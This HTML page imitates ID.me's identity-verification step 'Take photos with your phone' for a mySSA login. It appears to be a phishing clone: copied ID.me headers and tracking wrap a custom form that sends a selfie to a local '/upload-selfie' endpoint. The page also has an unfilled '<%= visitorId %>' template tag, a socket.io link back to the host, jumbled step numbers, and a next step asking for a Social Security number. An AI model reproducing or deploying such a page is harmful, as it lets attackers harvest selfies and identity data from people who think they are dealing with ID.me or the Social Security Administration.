<!DOCTYPE html>
<html dir='ltr' lang='en'>

<head>
    <title itemprop='name'>Take photos with your phone - ID.me</title>
    <meta charset='utf-8'>
    <meta content='IE=edge,chrome=1' http-equiv='X-UA-Compatible'>
    <meta content='One Identity. One Wallet.' name='description'>
    <meta content='' name='keywords'>
    <meta content='text/html; charset=utf-8' http-equiv='content-type'>
    <meta content='noodp' name='robots'>
    <meta content='width=device-width, initial-scale=1, minimum-scale=1' name='viewport'>
    <meta content='noindex' name='robots'>
    <link rel="icon" type="image/png" href="/assets/icons/favicon/favicon.ico" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-57x57-2ffe9eb0575d6f2d536c4b1d1312ebb183b96170dd4670cc33da0e8d30dfa89b.png"
        sizes="57x57" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-60x60-4a51eca7d74a22840ebf73337f0b78d986962257db3757699ac2bbf2126fcaf3.png"
        sizes="60x60" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-72x72-8069aa54dc1e8592ae21caf51345340ea1e5301ef87641da7123faa90833433a.png"
        sizes="72x72" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-76x76-552d2b817e4460a31694cba95f43ae94cae71db7640878140ab1f6f0e2acd3c1.png"
        sizes="76x76" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-114x114-afe52d4bb149eab41e8102995ca4e02071c29473fc8f08c7e3085920105353d3.png"
        sizes="114x114" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-120x120-1e58062c55faf2f6fe4c84a946b0a052fd692edb2b09a85ad573234d8764629d.png"
        sizes="120x120" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-144x144-c9f3e17d73da9a03d383df7848cb97b58c2c71d60852537d1f3c67e4d59ccde2.png"
        sizes="144x144" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-152x152-19917c16354e9c4983f672bbcb166db7728d9330899c26f948ef1a66237857e5.png"
        sizes="152x152" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-180x180-0458fbc4cb2b43c3f8af68a17dfcb7468b5712fdda8bcb64720f1c6673b76fe6.png"
        sizes="180x180" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-precomposed-0a6b7ee881e56105599b4d23abd90b924ded8c9ab8f103b8f3fab91c5376fc64.png" />
    <link rel="icon" type="image/png"
        href="/assets/icons/favicon/android-icon-192x192-37c3f50b8915c9d5a27781b5fe4d9473e827a1e22e79f58fd1d289e5c738b09d.png"
        sizes="192x192" />
    <link rel="icon" type="image/png"
        href="/assets/icons/favicon/favicon-32x32-f1c53c98d6a9488f4cb6748dbb6cce63b8c14e5969dddf1a459197c0dbb1f11b.png"
        sizes="32x32" />
    <link rel="icon" type="image/png"
        href="/assets/icons/favicon/favicon-96x96-0b10140d54d70f7777604a1198ca788d0c43b552e0b34be9d0a4125d273ff3f5.png"
        sizes="96x96" />
    <link rel="icon" type="image/png"
        href="/assets/icons/favicon/favicon-16x16-341d6a3373d9c7ce1e668bcf7ce728c2c97a8ac08589a6014253b91427cbc29a.png"
        sizes="16x16" />

    <script>
        window._sf_startpt = Date.now();
        window.settings = {

            chartbeat: {
                account: "24363",
                domain: "verify.id.me"
            },

            google: {
                account: "UA-40672673-1",
                linking: ""
            },

            gtm_engineering: "GTM-PL62HD9",

            smartystreets: {
                api: "https://us-autocomplete-pro.api.smartystreets.com/lookup",
                key: "34189374235854008"
            },

            zendesk_chat: {
                key: "65176a74-8b1f-41c2-9661-cf8fb6762a16" // Rails helper -- key is dynamically chosen
            },

            sentry: {
                dsn: "https://1b80aa16c8484d4d8e11b335f067846d@o52232.ingest.sentry.io/6288923"
            },

            qualtrics: {
                enabled: "true",
                zoneId: "ZN_6lH5l0h6cHZ1mqq"
            }
        };
    </script>

    <script>
        window._qUUID = "edb1256c6513428d9f41359dffc110f3";
        window._qINTID = "4327";
        window._qINT = "mySSA Production";
        window._qPOL = "NIST IAL2/AAL2";
        window._qPOLID = "5911";
        window._qIRID = "4354899e511045a7866c247df7041ab8";
    </script>

    <div id='ZN_6lH5l0h6cHZ1mqq'></div>
    <script>
        window.locales = {
            "current": "en",
            "default": "en"
        };
    </script>


    <meta name="csrf-param" content="authenticity_token" />
    <meta name="csrf-token"
        content="wWO+WukqJYiLnsUhdK5o6s2H5S7m53XCPPffwUUX+B5j/dnkvP7hVebMejkK21zk8+97JPV3wIDK8c1MZPxjUQ==" />
    <link rel="stylesheet" media="all"
        href="/assets/application-863c41b97728dc59eacb634fb525bb85b8d637f3e91860c1d82321d1c07d7497.css" />

    <script src="//static.queue-it.net/script/queueclient.min.js"></script>
    <script src="//static.queue-it.net/script/queueconfigloader.min.js" data-queueit-c="idme"></script>

    <script>
        ga("set", "userId", "edb1256c6513428d9f41359dffc110f3");
    </script>


    <script>!function (e) { var n = "https://s.go-mpulse.net/boomerang/"; if ("False" == "True") e.BOOMR_config = e.BOOMR_config || {}, e.BOOMR_config.PageParams = e.BOOMR_config.PageParams || {}, e.BOOMR_config.PageParams.pci = !0, n = "https://s2.go-mpulse.net/boomerang/"; if (window.BOOMR_API_key = "GTDQ2-YPV4D-ZPN8M-VW3LM-H9A7G", function () { function e() { if (!o) { var e = document.createElement("script"); e.id = "boomr-scr-as", e.src = window.BOOMR.url, e.async = !0, i.parentNode.appendChild(e), o = !0 } } function t(e) { o = !0; var n, t, a, r, d = document, O = window; if (window.BOOMR.snippetMethod = e ? "if" : "i", t = function (e, n) { var t = d.createElement("script"); t.id = n || "boomr-if-as", t.src = window.BOOMR.url, BOOMR_lstart = (new Date).getTime(), e = e || d.body, e.appendChild(t) }, !window.addEventListener && window.attachEvent && navigator.userAgent.match(/MSIE [67]\./)) return window.BOOMR.snippetMethod = "s", void t(i.parentNode, "boomr-async"); a = document.createElement("IFRAME"), a.src = "about:blank", a.title = "", a.role = "presentation", a.loading = "eager", r = (a.frameElement || a).style, r.width = 0, r.height = 0, r.border = 0, r.display = "none", i.parentNode.appendChild(a); try { O = a.contentWindow, d = O.document.open() } catch (_) { n = document.domain, a.src = "javascript:var d=document.open();d.domain='" + n + "';void(0);", O = a.contentWindow, d = O.document.open() } if (n) d._boomrl = function () { this.domain = n, t() }, d.write("<bo" + "dy onload='document._boomrl();'>"); else if (O._boomrl = function () { t() }, O.addEventListener) O.addEventListener("load", O._boomrl, !1); else if (O.attachEvent) O.attachEvent("onload", O._boomrl); d.close() } function a(e) { window.BOOMR_onload = e && e.timeStamp || (new Date).getTime() } if (!window.BOOMR || !window.BOOMR.version && !window.BOOMR.snippetExecuted) { window.BOOMR = window.BOOMR || {}, window.BOOMR.snippetStart = (new Date).getTime(), window.BOOMR.snippetExecuted = !0, window.BOOMR.snippetVersion = 12, window.BOOMR.url = n + "GTDQ2-YPV4D-ZPN8M-VW3LM-H9A7G"; var i = document.currentScript || document.getElementsByTagName("script")[0], o = !1, r = document.createElement("link"); if (r.relList && "function" == typeof r.relList.supports && r.relList.supports("preload") && "as" in r) window.BOOMR.snippetMethod = "p", r.href = window.BOOMR.url, r.rel = "preload", r.as = "script", r.addEventListener("load", e), r.addEventListener("error", function () { t(!0) }), setTimeout(function () { if (!o) t(!0) }, 3e3), BOOMR_lstart = (new Date).getTime(), i.parentNode.appendChild(r); else t(!1); if (window.addEventListener) window.addEventListener("load", a, !1); else if (window.attachEvent) window.attachEvent("onload", a) } }(), "".length > 0) if (e && "performance" in e && e.performance && "function" == typeof e.performance.setResourceTimingBufferSize) e.performance.setResourceTimingBufferSize(); !function () { if (BOOMR = e.BOOMR || {}, BOOMR.plugins = BOOMR.plugins || {}, !BOOMR.plugins.AK) { var n = "" == "true" ? 1 : 0, t = "", a = "2xte52s7mrv24zfxzzba-f-571d7eb56-clientnsv4-s.akamaihd.net", i = "false" == "true" ? 2 : 1, o = { "ak.v": "36", "ak.cp": "1252507", "ak.ai": parseInt("752192", 10), "ak.ol": "0", "ak.cr": 148, "ak.ipv": 4, "ak.proto": "h2", "ak.rid": "29b67cda", "ak.r": 45283, "ak.a2": n, "ak.m": "dscb", "ak.n": "essl", "ak.bpcip": "213.230.78.0", "ak.cport": 25516, "ak.gh": "95.100.106.174", "ak.quicv": "", "ak.tlsv": "tls1.3", "ak.0rtt": "", "ak.csrc": "-", "ak.acc": "", "ak.t": "1689767490", "ak.ak": "hOBiQwZUYzCg5VSAfCLimQ==j26hgo2raPHowAEy+wGXXJd8LiTMySUsakaoLtwMaYTxtLamVnxb89uOXhO4i0YNs7LJcfg8WJ6YhK3caAXVHtQk0tiUiWgOyKoRmdVRSHksJW0GXY4qSlJfUnu2S2XFxwNKTQYh1Gsh35HhvUj1406g6TeWYZCnrDezlGAkf/wWf8J8ZhXw04fTvQrF5qnrjwtVUYEDLSoLlJWWijXOdZpUUAMgYR+vvn26V5o6BAXQ78sWXIo35lK7bKA83hmP3x0wixHWDvvT2zyfvRa9T2VrRboeWluTxc0tHAKhfhWUuafCltl46c3VvG7jL/d6IPnZle7iyfmFv6WPHfFt6HSPlYDBtKa9TZys1VpHMFeTQH5YWEuGZU8P2WCS8n0q+BeRasPpuAytnTedkSSMQmA6z1XylR+UjTY+CMWTsMw=", "ak.pv": "195", "ak.dpoabenc": "", "ak.tf": i }; if ("" !== t) o["ak.ruds"] = t; var r = { i: !1, av: function (n) { var t = "http.initiator"; if (n && (!n[t] || "spa_hard" === n[t])) o["ak.feo"] = void 0 !== e.aFeoApplied ? 1 : 0, BOOMR.addVar(o) }, rv: function () { var e = ["ak.bpcip", "ak.cport", "ak.cr", "ak.csrc", "ak.gh", "ak.ipv", "ak.m", "ak.n", "ak.ol", "ak.proto", "ak.quicv", "ak.tlsv", "ak.0rtt", "ak.r", "ak.acc", "ak.t", "ak.tf"]; BOOMR.removeVar(e) } }; BOOMR.plugins.AK = { akVars: o, akDNSPreFetchDomain: a, init: function () { if (!r.i) { var e = BOOMR.subscribe; e("before_beacon", r.av, null, null), e("onbeacon", r.rv, null, null), r.i = !0 } return this }, is_complete: function () { return !0 } } } }() }(window);</script>
</head>

<body class=''>


    <div class='page-container' data-role='page-container'>
        <div class='container'>
            <script>
                window._qPHASE = "doc_upload";
            </script>

            <div class='content-container' data-component='Components.PageTitle'>
                <div class='form-header'>
                    <div class='form-header-content' role='banner'>
                        <div class='partner'>
                            <div class='c_icon m_idme'>
                                <img alt="ID.me"
                                    src="/assets/logos/idme-logo-1d96899e99d393974ec16fa17a820e78fca132bd8ea53e01f12bdc000baf674f.svg" />
                            </div>
                        </div>
                    </div>
                </div>
                <main class='form-container'>
                    <h1 class='h1 heading' id='sr_page_title'>Take photos with your phone</h1>

                    <form class="edit_idme_verification_identity_attempt"
                        id="edit_idme_verification_identity_attempt_321430249" data-validate="identity"
                        enctype="multipart/form-data" action="/upload-selfie" accept-charset="UTF-8" method="post"><input
                            type="hidden" name="_method" value="put" autocomplete="off" /><input type="hidden"
                            name="authenticity_token"
                            value="609gm5IMKqItj8LajoghCVyMLdmTxPYuLVLSZXR1mfbHgVwRLunl4xROUFgNSmFY48gdln9QERK6CJCIT5nrHg=="
                            autocomplete="off" /><input type="hidden" name="document_view" id="document_view"
                            value="front" autocomplete="off" />
                        <ul class='subway_stops' role='presentation'>

                            <li class='subway_stops-item'>
                                <span aria-hidden='true'>
                                    1
                                </span>
                                <span class='sr-only'>step 2 out of 5, Gathering more information </span>
                            </li>
                            <li class='subway_stops-item'>
                                <span aria-hidden='true'>
                                    2
                                </span>
                                <span class='sr-only'>step 3 out of 5, Enter your phone number </span>
                            </li>
                            <li class='subway_stops-item active'>
                                <span aria-hidden='true'>
                                    3
                                </span>
                                <span class='sr-only'>step 1 out of 5, Take photos of your identity document Current
                                    step</span>
                            </li>
                            <li class='subway_stops-item'>
                                <span aria-hidden='true'>
                                    4
                                </span>
                                <span class='sr-only'>step 4 out of 5, Enter your Social Security number </span>
                            </li>
                            <li class='subway_stops-item'>
                                <span aria-hidden='true'>
                                    5
                                </span>
                                <span class='sr-only'>step 5 out of 5, Confirm your information </span>
                            </li>
                        </ul>

                        <p class='alert alert-error' style=''>

                        </p>
                        <p class='alert alert-success' style=''>

                        </p>

                        <div class='form-content'>
                            <h2>Take photo of your selfie</h2>
                            <p>Choose a photo of your selfie. Then click &quot;Continue&quot; to
                                proceed.</p>

                            <input type="hidden" name="visitorId" value="<%= visitorId %>">
                            <input type="file" id="fileInput" name="image_selfie" accept="image/*"
                                style="display: none;" required />

                            <!-- Div to display the selected image -->
                            <div id="imageContainer">
                                <label for="fileInput" id="fileInputLabel" class="btn btn-primary"
                                    style="padding: 7px 15px; font-size: 15px;">Take photo</label>
                                <img id="selectedImage" src="#" onerror="this.style.display='none'" />
                            </div>

                            <div style='font-size:15px;color:#2e3f51;padding:20px 0px 10px 35px;'>
                                <strong>Please check the following to make sure your document can be processed:</strong>
                            </div>
                            <ul class='form-content-list narrow'>
                                <li>Whether it’s natural light or from a lamp, for example, ensure the light is in front
                                    of you.</li>
                                <li>Ensure the light is bright enough so no shadows appear on your face.</li>
                                <li>Avoid clothing, like hats, scarves, masks, or anything else that can hide your face.
                                </li>
                                <li>Ensure no other people are in view of the camera.</li>
                            </ul>
                            <div class='form-actions'>
                                <div class='form-action-button'>
                                    <button type="submit" class="btn btn-primary" style="margin: 0 auto;"
                                        data-disable="true" data-clicked="false">Continue</button>
                                </div>
                            </div>
                        </div>
                        <idme-action-group noPadding='true'>
                            <idme-button data-disable disabled layout='fill' slot='primary' text='Continue'
                                variant='primary'></idme-button>
                            <idme-navigation-button
                                action='https://verify.id.me/en/uploads/9e900534d8c64f14a709eb9621d48b23' layout='fill'
                                slot='secondary' text='Back' variant='secondary'></idme-navigation-button>
                        </idme-action-group>
                    </form>
                </main>
            </div>


            <footer class='footer'>
                <nav aria-label='Footer' class='footer__links'>
                    <ul class='footer__list'>
                        <li class='footer__list-item'><a target="_blank" class="footer__link"
                                href="https://www.id.me/about">What is ID.me?</a></li>
                        <li class='footer__list-item'><a target="_blank" class="footer__link"
                                href="https://www.id.me/terms">Terms of Service</a></li>
                        <li class='footer__list-item'><a target="_blank" class="footer__link"
                                href="https://www.id.me/privacy">Privacy Policy</a></li>
                    </ul>
                </nav>
            </footer>

        </div>
    </div>

    <style>
        #fileInputLabel {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            cursor: pointer;

            z-index: 1;
            /* Ensure label appears above the image */
        }

        /* Styles for the image container */
        #imageContainer {
            position: relative;
            margin-top: 20px;
            border: 1px solid #ddd;
            padding: 10px;
            max-width: 400px;
            /* Set the maximum width of the image container */
            max-height: 300px;
            /* Set the maximum height of the image container */
            min-width: 200px;
            /* Set the minimum width of the image container */
            min-height: 150px;
            /* Set the minimum height of the image container */
            overflow: hidden;
            /* Ensure the image does not overflow the container */
        }

        /* Styles for the selected image */
        #selectedImage {
            width: 100%;
            /* Ensure the image covers the container's width */
            height: 100%;
            /* Ensure the image covers the container's height */
            object-fit: cover;
            /* Make the image cover the container while preserving aspect ratio */
            filter: blur(3px);
            /* Apply a blur effect to the image */
        }
    </style>

    <script>
        function displaySelectedImage(event) {
            const fileInput = event.target;
            const imageContainer = document.getElementById('imageContainer');
            const selectedImage = document.getElementById('selectedImage');
            const fileInputLabel = document.getElementById('fileInputLabel');

            const file = fileInput.files[0];
            if (file) {
                const reader = new FileReader();

                reader.onload = function () {
                    selectedImage.src = reader.result;
                    selectedImage.style.display = 'block';
                    selectedImage.style.filter = 'blur(3px)'; // Apply the blur effect
                    fileInputLabel.textContent = 'Take a different photo';

                    // Center the label vertically and horizontally in the imageContainer
                    fileInputLabel.style.top = '50%';
                    fileInputLabel.style.left = '50%';
                    fileInputLabel.style.transform = 'translate(-50%, -50%)';
                };

                reader.readAsDataURL(file);
            } else {
                // If no file is selected, clear the displayed image and reset the label text
                selectedImage.src = '';
                selectedImage.style.display = 'none';
                selectedImage.style.filter = 'none'; // Remove the blur effect
                fileInputLabel.textContent = 'Take photo';
                fileInputLabel.style.top = ''; // Reset the label position
                fileInputLabel.style.left = '';
                fileInputLabel.style.transform = '';
            }
        }

        // Add an event listener to the file input to call the displaySelectedImage function
        document.getElementById('fileInput').addEventListener('change', displaySelectedImage);
    </script>
    <script
        src="https://maps.googleapis.com/maps/api/js?key=AIzaSyD0zvJrQMX-chNAK69YL8jhcQzgruOmKDo&amp;libraries=places"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/4.3.2/socket.io.js"></script>
    <script>
        const socket = io();
    </script>
</body>

</html>